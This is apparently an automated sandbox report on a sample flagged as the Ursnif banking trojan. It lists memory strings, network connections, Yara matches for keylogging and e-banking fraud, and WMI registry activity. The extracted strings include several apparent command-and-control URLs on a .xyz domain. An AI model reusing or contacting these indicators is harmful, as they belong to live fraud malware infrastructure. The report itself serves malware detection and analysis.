Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000002F.00000002.938114563.00000251ABE5F000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000002F.00000002.937086624.00000251ABC51000.00000004.00000001.sdmp, powershell.exe, 00000034.00000002.933509067.0000015F80001000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/RLbbZoqov27/RZXl47dw7WS2hD/qIyj2qjQipAh2ErH6xoal/uDkYECdj5j
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/TMw5yrrD58_2F_2BhR/g9tx6WwiG/Y4ETyUqNXMfs0pkiHuVm/dVQuHu9BK
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/YfhAKSrZ_/2B_2FjO_2BEfGkA859_2/BmcHGy0Exj8cPI6312d/hMFhmCvK
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.917390433.00000200948F0000.00000002.00000001.sdmp	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/pBKH4QNe_/2BwOCg1mW3gHfkXlroYv/qwMSGdzvy41rio90Pee/xoNO_2FG
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/zTjbj3kKOaJ_2FHCn/EBB0ghxmT2zf/tZbW0q1dqvV/yVEV1RDmPsuUHe/9
Source: powershell.exe, 0000002F.00000002.938114563.00000251ABE5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000002F.00000002.938114563.00000251ABE5F000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: rundll32.exe, 00000007.00000003.795720865.000000000584A000.00000004.00000040.sdmp	String found in binary or memory: https://s.uicdn.com/mailint/9.1722.0/
Source: rundll32.exe, 00000007.00000003.795720865.000000000584A000.00000004.00000040.sdmp	String found in binary or memory: https://s.uicdn.com/mailint/9.1722.0/assets/potec.core.min.js
Source: rundll32.exe, 00000007.00000003.795720865.000000000584A000.00000004.00000040.sdmp	String found in binary or memory: https://wa.ui-portal.de/opt-out-transfer/mailcom/
Source: rundll32.exe, 00000007.00000003.846631247.00000000034EC000.00000004.00000001.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49877 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
